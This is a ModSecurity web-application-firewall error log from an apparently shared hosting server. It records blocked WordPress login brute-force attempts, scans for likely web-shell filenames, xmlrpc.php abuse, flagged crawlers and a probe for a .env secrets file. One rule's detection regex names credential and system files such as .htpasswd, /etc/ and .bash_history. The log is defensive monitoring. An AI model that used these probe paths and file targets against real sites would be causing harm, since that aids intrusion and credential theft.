[Tue May 26 16:28:26.616479 2026] [security2:error] [pid 795941:tid 796184] [client 62.60.130.228:52154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahV80u2GQ_TLE_VHIp2vTwAAAPY"], referer: https://wordpress.org/
[Tue May 26 16:28:26.815228 2026] [security2:error] [pid 795941:tid 796097] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV80e2GQ_TLE_VHIp2vJAAAAJ8"]
[Tue May 26 16:28:26.817844 2026] [security2:error] [pid 795941:tid 796134] [client 92.118.39.194:18236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 194.39.118.92.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "ahV80u2GQ_TLE_VHIp2vUAAAAMQ"]
[Tue May 26 16:28:27.257533 2026] [security2:error] [pid 795941:tid 796183] [client 74.249.212.138:7108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/xenon1337.php"] [unique_id "ahV80-2GQ_TLE_VHIp2vVQAAAPU"]
[Tue May 26 16:28:27.257688 2026] [security2:error] [pid 795941:tid 796183] [client 74.249.212.138:7108] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/xenon1337.php"] [unique_id "ahV80-2GQ_TLE_VHIp2vVQAAAPU"]
[Tue May 26 16:28:27.576465 2026] [security2:error] [pid 795941:tid 796129] [client 74.249.212.138:7150] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/alfa403.php"] [unique_id "ahV80-2GQ_TLE_VHIp2vXwAAAL8"]
[Tue May 26 16:28:27.576565 2026] [security2:error] [pid 795941:tid 796129] [client 74.249.212.138:7150] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/alfa403.php"] [unique_id "ahV80-2GQ_TLE_VHIp2vXwAAAL8"]
[Tue May 26 16:28:27.920968 2026] [security2:error] [pid 795941:tid 796098] [client 123.24.37.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV80u2GQ_TLE_VHIp2vRQAAAKA"]
[Tue May 26 16:28:28.220187 2026] [security2:error] [pid 795941:tid 796111] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV81O2GQ_TLE_VHIp2vbQAAAK0"]
[Tue May 26 16:28:28.552959 2026] [security2:error] [pid 795941:tid 796174] [client 74.249.212.138:7161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/test11.php"] [unique_id "ahV81O2GQ_TLE_VHIp2vdQAAAOw"]
[Tue May 26 16:28:28.553101 2026] [security2:error] [pid 795941:tid 796174] [client 74.249.212.138:7161] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/test11.php"] [unique_id "ahV81O2GQ_TLE_VHIp2vdQAAAOw"]
[Tue May 26 16:28:29.100799 2026] [security2:error] [pid 795941:tid 796145] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV80-2GQ_TLE_VHIp2vZwAAAM8"]
[Tue May 26 16:28:29.213145 2026] [security2:error] [pid 795941:tid 796117] [client 62.60.130.228:51932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahV81e2GQ_TLE_VHIp2vhQAAALM"], referer: https://www.facebook.com/
[Tue May 26 16:28:29.579505 2026] [security2:error] [pid 795941:tid 796110] [client 74.249.212.138:7041] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/koala.php"] [unique_id "ahV81e2GQ_TLE_VHIp2vjAAAAKw"]
[Tue May 26 16:28:29.579631 2026] [security2:error] [pid 795941:tid 796110] [client 74.249.212.138:7041] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/koala.php"] [unique_id "ahV81e2GQ_TLE_VHIp2vjAAAAKw"]
[Tue May 26 16:28:30.357171 2026] [security2:error] [pid 795941:tid 796198] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV81u2GQ_TLE_VHIp2vmAAAAQQ"]
[Tue May 26 16:28:30.762653 2026] [security2:error] [pid 795941:tid 796123] [client 92.118.39.194:18208] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV81u2GQ_TLE_VHIp2vowAAALk"]
[Tue May 26 16:28:30.767061 2026] [security2:error] [pid 795941:tid 796084] [client 74.249.212.138:7141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/mac.php"] [unique_id "ahV81u2GQ_TLE_VHIp2vpwAAAJI"]
[Tue May 26 16:28:30.767215 2026] [security2:error] [pid 795941:tid 796084] [client 74.249.212.138:7141] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/mac.php"] [unique_id "ahV81u2GQ_TLE_VHIp2vpwAAAJI"]
[Tue May 26 16:28:30.912744 2026] [security2:error] [pid 795941:tid 796135] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV81e2GQ_TLE_VHIp2vjwAAAMU"]
[Tue May 26 16:28:30.996408 2026] [security2:error] [pid 795941:tid 796021] [remote 103.95.119.103:53830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahV81u2GQ_TLE_VHIp2vqAAAjE8"]
[Tue May 26 16:28:31.100112 2026] [security2:error] [pid 795941:tid 796087] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV81-2GQ_TLE_VHIp2vqwAAAJU"]
[Tue May 26 16:28:31.109918 2026] [security2:error] [pid 795941:tid 795968] [remote 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV81-2GQ_TLE_VHIp2vrwAAjxo"]
[Tue May 26 16:28:31.110080 2026] [security2:error] [pid 795941:tid 796081] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV81-2GQ_TLE_VHIp2vrwAAjxo"]
[Tue May 26 16:28:31.775932 2026] [security2:error] [pid 795941:tid 796095] [client 74.249.212.138:7138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/25d653587fdfd1.php"] [unique_id "ahV81-2GQ_TLE_VHIp2vuQAAAJ0"]
[Tue May 26 16:28:31.776068 2026] [security2:error] [pid 795941:tid 796095] [client 74.249.212.138:7138] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/25d653587fdfd1.php"] [unique_id "ahV81-2GQ_TLE_VHIp2vuQAAAJ0"]
[Tue May 26 16:28:32.321771 2026] [security2:error] [pid 795941:tid 796091] [client 74.249.212.138:7115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/wefile.php"] [unique_id "ahV82O2GQ_TLE_VHIp2vygAAAJk"]
[Tue May 26 16:28:32.321879 2026] [security2:error] [pid 795941:tid 796091] [client 74.249.212.138:7115] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/wefile.php"] [unique_id "ahV82O2GQ_TLE_VHIp2vygAAAJk"]
[Tue May 26 16:28:32.409964 2026] [security2:error] [pid 795941:tid 796126] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV81-2GQ_TLE_VHIp2vrgAAALw"]
[Tue May 26 16:28:32.567528 2026] [security2:error] [pid 795941:tid 796123] [client 74.249.212.138:7107] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/casp3.php"] [unique_id "ahV82O2GQ_TLE_VHIp2v0QAAALk"]
[Tue May 26 16:28:32.567669 2026] [security2:error] [pid 795941:tid 796123] [client 74.249.212.138:7107] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/casp3.php"] [unique_id "ahV82O2GQ_TLE_VHIp2v0QAAALk"]
[Tue May 26 16:28:33.016539 2026] [security2:error] [pid 795941:tid 796168] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV82O2GQ_TLE_VHIp2v1wAAAOY"]
[Tue May 26 16:28:33.280104 2026] [security2:error] [pid 795941:tid 796109] [client 74.249.212.138:7052] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.gldmarsa.com"] [uri "/___proxy_subdomain_webmail/wp-includes/blocks/post-comments-form/"] [unique_id "ahV82e2GQ_TLE_VHIp2v3gAAAKs"]
[Tue May 26 16:28:33.350389 2026] [security2:error] [pid 795941:tid 795985] [remote 57.141.2.11:30361] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 11.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahV82e2GQ_TLE_VHIp2v3wAAzis"]
[Tue May 26 16:28:33.478230 2026] [security2:error] [pid 795941:tid 796197] [client 92.118.39.194:18276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV82e2GQ_TLE_VHIp2v4wAAAQM"]
[Tue May 26 16:28:33.715889 2026] [security2:error] [pid 795941:tid 796094] [client 74.249.212.138:7052] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.gldmarsa.com"] [uri "/___proxy_subdomain_webmail/wp-admin/js/"] [unique_id "ahV82e2GQ_TLE_VHIp2v6gAAAJw"]
[Tue May 26 16:28:33.780331 2026] [security2:error] [pid 795941:tid 796075] [client 74.249.212.138:7052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/wp-admin/css/colour.php"] [unique_id "ahV82e2GQ_TLE_VHIp2v7AAAAIk"]
[Tue May 26 16:28:33.780426 2026] [security2:error] [pid 795941:tid 796075] [client 74.249.212.138:7052] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/wp-admin/css/colour.php"] [unique_id "ahV82e2GQ_TLE_VHIp2v7AAAAIk"]
[Tue May 26 16:28:34.317491 2026] [security2:error] [pid 795941:tid 796086] [client 74.249.212.138:7050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/half.php"] [unique_id "ahV82u2GQ_TLE_VHIp2v-wAAAJQ"]
[Tue May 26 16:28:34.317613 2026] [security2:error] [pid 795941:tid 796086] [client 74.249.212.138:7050] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/half.php"] [unique_id "ahV82u2GQ_TLE_VHIp2v-wAAAJQ"]
[Tue May 26 16:28:34.454507 2026] [security2:error] [pid 795941:tid 796198] [client 185.191.171.6:42398] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahV82u2GQ_TLE_VHIp2v_AAAAQQ"]
[Tue May 26 16:28:34.454678 2026] [security2:error] [pid 795941:tid 796198] [client 185.191.171.6:42398] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahV82u2GQ_TLE_VHIp2v_AAAAQQ"]
[Tue May 26 16:28:34.468821 2026] [security2:error] [pid 795941:tid 796117] [client 74.249.212.138:7053] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/2P.php"] [unique_id "ahV82u2GQ_TLE_VHIp2v_QAAALM"]
[Tue May 26 16:28:34.468955 2026] [security2:error] [pid 795941:tid 796117] [client 74.249.212.138:7053] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/2P.php"] [unique_id "ahV82u2GQ_TLE_VHIp2v_QAAALM"]
[Tue May 26 16:28:34.562795 2026] [security2:error] [pid 795941:tid 796139] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV82e2GQ_TLE_VHIp2v5gAAAMk"]
[Tue May 26 16:28:34.841477 2026] [security2:error] [pid 795941:tid 796141] [client 74.7.230.15:49468] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "courses.bloggertarget.com"] [uri "/index.php"] [unique_id "ahV82e2GQ_TLE_VHIp2v6wAAy38"]
[Tue May 26 16:28:34.841505 2026] [security2:error] [pid 795941:tid 796141] [client 74.7.230.15:49468] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "courses.bloggertarget.com"] [uri "/index.php"] [unique_id "ahV82e2GQ_TLE_VHIp2v6wAAy38"]
[Tue May 26 16:28:34.870318 2026] [security2:error] [pid 795941:tid 796148] [client 74.249.212.138:7131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/tires.php"] [unique_id "ahV82u2GQ_TLE_VHIp2wCwAAANI"]
[Tue May 26 16:28:34.870461 2026] [security2:error] [pid 795941:tid 796148] [client 74.249.212.138:7131] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/tires.php"] [unique_id "ahV82u2GQ_TLE_VHIp2wCwAAANI"]
[Tue May 26 16:28:35.201466 2026] [security2:error] [pid 795941:tid 796175] [client 74.7.230.15:50886] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.courses.bloggertarget.com"] [uri "/index.php"] [unique_id "ahV82-2GQ_TLE_VHIp2wDQAA7TQ"], referer: https://courses.bloggertarget.com/robots.txt
[Tue May 26 16:28:35.342987 2026] [security2:error] [pid 795941:tid 796150] [client 74.249.212.138:7041] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.gldmarsa.com"] [uri "/___proxy_subdomain_webmail/wordpress/wp-admin/maint/"] [unique_id "ahV82-2GQ_TLE_VHIp2wEQAAANQ"]
[Tue May 26 16:28:35.471558 2026] [security2:error] [pid 795941:tid 796196] [client 74.249.212.138:7041] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/like.php"] [unique_id "ahV82-2GQ_TLE_VHIp2wGgAAAQI"]
[Tue May 26 16:28:35.471646 2026] [security2:error] [pid 795941:tid 796196] [client 74.249.212.138:7041] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/like.php"] [unique_id "ahV82-2GQ_TLE_VHIp2wGgAAAQI"]
[Tue May 26 16:28:36.535560 2026] [security2:error] [pid 795941:tid 796148] [client 74.249.212.138:7056] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/.well-known/about.php"] [unique_id "ahV83O2GQ_TLE_VHIp2wNQAAANI"]
[Tue May 26 16:28:36.535703 2026] [security2:error] [pid 795941:tid 796148] [client 74.249.212.138:7056] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/.well-known/about.php"] [unique_id "ahV83O2GQ_TLE_VHIp2wNQAAANI"]
[Tue May 26 16:28:36.713071 2026] [security2:error] [pid 795941:tid 796116] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV82-2GQ_TLE_VHIp2wHQAAALI"]
[Tue May 26 16:28:37.495831 2026] [security2:error] [pid 795941:tid 796106] [client 74.249.212.138:7055] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahV83e2GQ_TLE_VHIp2wQwAAAKg"]
[Tue May 26 16:28:37.495990 2026] [security2:error] [pid 795941:tid 796106] [client 74.249.212.138:7055] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahV83e2GQ_TLE_VHIp2wQwAAAKg"]
[Tue May 26 16:28:37.820445 2026] [security2:error] [pid 795941:tid 796026] [remote 84.247.181.196:50286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahV83e2GQ_TLE_VHIp2wTAAAnFQ"]
[Tue May 26 16:28:38.091488 2026] [security2:error] [pid 795941:tid 796176] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV83e2GQ_TLE_VHIp2wVQAAAO4"]
[Tue May 26 16:28:38.173549 2026] [security2:error] [pid 795941:tid 796174] [client 74.249.212.138:7157] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/bob.php"] [unique_id "ahV83u2GQ_TLE_VHIp2wVwAAAOw"]
[Tue May 26 16:28:38.173647 2026] [security2:error] [pid 795941:tid 796174] [client 74.249.212.138:7157] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/bob.php"] [unique_id "ahV83u2GQ_TLE_VHIp2wVwAAAOw"]
[Tue May 26 16:28:38.207065 2026] [security2:error] [pid 795941:tid 796142] [client 92.118.39.194:32880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/sites/default/.env"] [unique_id "ahV83u2GQ_TLE_VHIp2wWAAAAMw"]
